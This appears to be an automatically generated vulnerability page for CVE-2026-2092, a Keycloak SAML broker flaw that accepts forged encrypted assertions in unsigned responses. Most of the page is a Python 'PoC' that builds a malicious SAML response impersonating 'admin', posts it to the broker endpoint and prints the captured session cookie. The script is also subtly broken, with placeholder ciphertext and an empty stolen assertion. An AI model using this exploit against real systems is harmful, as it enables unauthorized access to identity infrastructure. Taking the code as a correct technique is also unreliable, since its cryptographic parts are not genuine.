Security Vulnerability Report
CVE-2026-2092 CVSS 7.7 HIGH

CVE-2026-2092

Published: 2026-03-18 02:16:25
Last Modified: 2026-03-18 14:52:44

Description

A flaw was found in Keycloak. Keycloak's Security Assertion Markup Language (SAML) broker endpoint does not properly validate encrypted assertions when the overall SAML response is not signed. An attacker with a valid signed SAML assertion can exploit this by crafting a malicious SAML response. This allows the attacker to inject an encrypted assertion for an arbitrary principal, leading to unauthorized access and potential information disclosure.

CVSS Details

CVSS Score: 7.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Keycloak < 25.0.0
Keycloak < 24.0.5
Keycloak < 23.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-2092 PoC - Keycloak SAML Encrypted Assertion Bypass
# This PoC demonstrates the vulnerability where Keycloak fails to properly
# validate encrypted assertions when the overall SAML response is not signed

import requests
import base64
from lxml import etree
from datetime import datetime

TARGET_URL = "https://vulnerable-keycloak.com/auth/realms/{realm}/broker/saml/endpoint"
ATTACKER_ASSERTION = ""  # Valid signed SAML assertion from legitimate user
TARGET_USER = "admin"    # Target user to impersonate


def create_malicious_saml_response():
    """
    Create a malicious SAML response with:
    1. Unsigned response envelope
    2. Valid signed assertion (to establish trust)
    3. Malicious encrypted assertion for target principal
    """
    saml_response = f"""<?xml version="1.0" encoding="UTF-8"?>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
                xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
                ID="_id_{datetime.now().timestamp()}"
                Version="2.0"
                IssueInstant="{datetime.now().isoformat()}"
                Destination="{TARGET_URL}">
    <saml:Issuer>https://attacker-idp.com</saml:Issuer>
    <!-- Note: Response is NOT signed -->

    <!-- Valid signed assertion (stolen from legitimate auth) -->
    {ATTACKER_ASSERTION}

    <!-- Malicious encrypted assertion for target user -->
    <saml:EncryptedAssertion>
        <xenc:EncryptedData xmlns:xenc="http://www.w3.org/2001/04/xmlenc#"
                            Type="http://www.w3.org/2001/04/xmlenc#Element">
            <xenc:EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#aes256-cbc"/>
            <ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
                <xenc:EncryptedKey>
                    <xenc:EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#rsa-oaep-mgf1p"/>
                    <xenc:CipherData>
                        <xenc:CipherValue>[Encrypted Key Value]</xenc:CipherValue>
                    </xenc:CipherData>
                </xenc:EncryptedKey>
            </ds:KeyInfo>
            <xenc:CipherData>
                <xenc:CipherValue>
                    <!-- Encrypted assertion containing: -->
                    <!-- <saml:Assertion> -->
                    <!--   <saml:Subject> -->
                    <!--     <saml:NameID>{TARGET_USER}</saml:NameID> -->
                    <!--   </saml:Subject> -->
                    <!--   <saml:AttributeStatement> -->
                    <!--     <saml:Attribute Name="role"><saml:AttributeValue>admin</saml:AttributeValue></saml:Attribute> -->
                    <!--   </saml:AttributeStatement> -->
                    <!-- </saml:Assertion> -->
                </xenc:CipherValue>
            </xenc:CipherData>
        </xenc:EncryptedData>
    </saml:EncryptedAssertion>

    <samlp:Status>
        <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
    </samlp:Status>
</samlp:Response>"""
    return base64.b64encode(saml_response.encode()).decode()


def exploit():
    """Send malicious SAML response to Keycloak broker endpoint"""
    saml_response = create_malicious_saml_response()
    data = {
        "SAMLResponse": saml_response,
        "RelayState": "/admin/console"
    }
    response = requests.post(TARGET_URL, data=data, allow_redirects=False)
    if response.status_code == 302 and "location" in response.headers:
        print("[+] Exploit successful! Authentication bypassed.")
        print(f"[+] Session cookie: {response.headers.get('Set-Cookie')}")
        return True
    else:
        print("[-] Exploit failed or target not vulnerable")
        return False


if __name__ == "__main__":
    print("CVE-2026-2092 Keycloak SAML Assertion Bypass PoC")
    exploit()
```

References

https://access.redhat.com/errata/RHSA-2026:3925
https://access.redhat.com/errata/RHSA-2026:3926
https://access.redhat.com/errata/RHSA-2026:3947
https://access.redhat.com/errata/RHSA-2026:3948
https://access.redhat.com/security/cve/CVE-2026-2092
https://bugzilla.redhat.com/show_bug.cgi?id=2437296

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-2092",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-18T02:16:24.577",
    "lastModified": "2026-03-18T14:52:44.227",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A flaw was found in Keycloak. Keycloak's Security Assertion Markup Language (SAML) broker endpoint does not properly validate encrypted assertions when the overall SAML response is not signed. An attacker with a valid signed SAML assertion can exploit this by crafting a malicious SAML response. This allows the attacker to inject an encrypted assertion for an arbitrary principal, leading to unauthorized access and potential information disclosure."
      },
      {
        "lang": "es",
        "value": "Se encontró una vulnerabilidad en Keycloak. El endpoint del broker de Security Assertion Markup Language (SAML) de Keycloak no valida correctamente las aserciones cifradas cuando la respuesta SAML general no está firmada. Un atacante con una aserción SAML firmada válida puede explotar esto al crear una respuesta SAML maliciosa. Esto permite al atacante inyectar una aserción cifrada para un principal arbitrario, lo que lleva a un acceso no autorizado y a una potencial revelación de información."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:L",
            "baseScore": 7.7,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.3
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-1287"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://access.redhat.com/errata/RHSA-2026:3925",
        "source": "[email protected]"
      },
      {
        "url": "https://access.redhat.com/errata/RHSA-2026:3926",
        "source": "[email protected]"
      },
      {
        "url": "https://access.redhat.com/errata/RHSA-2026:3947",
        "source": "[email protected]"
      },
      {
        "url": "https://access.redhat.com/errata/RHSA-2026:3948",
        "source": "[email protected]"
      },
      {
        "url": "https://access.redhat.com/security/cve/CVE-2026-2092",
        "source": "[email protected]"
      },
      {
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437296",
        "source": "[email protected]"
      }
    ]
  }
}
```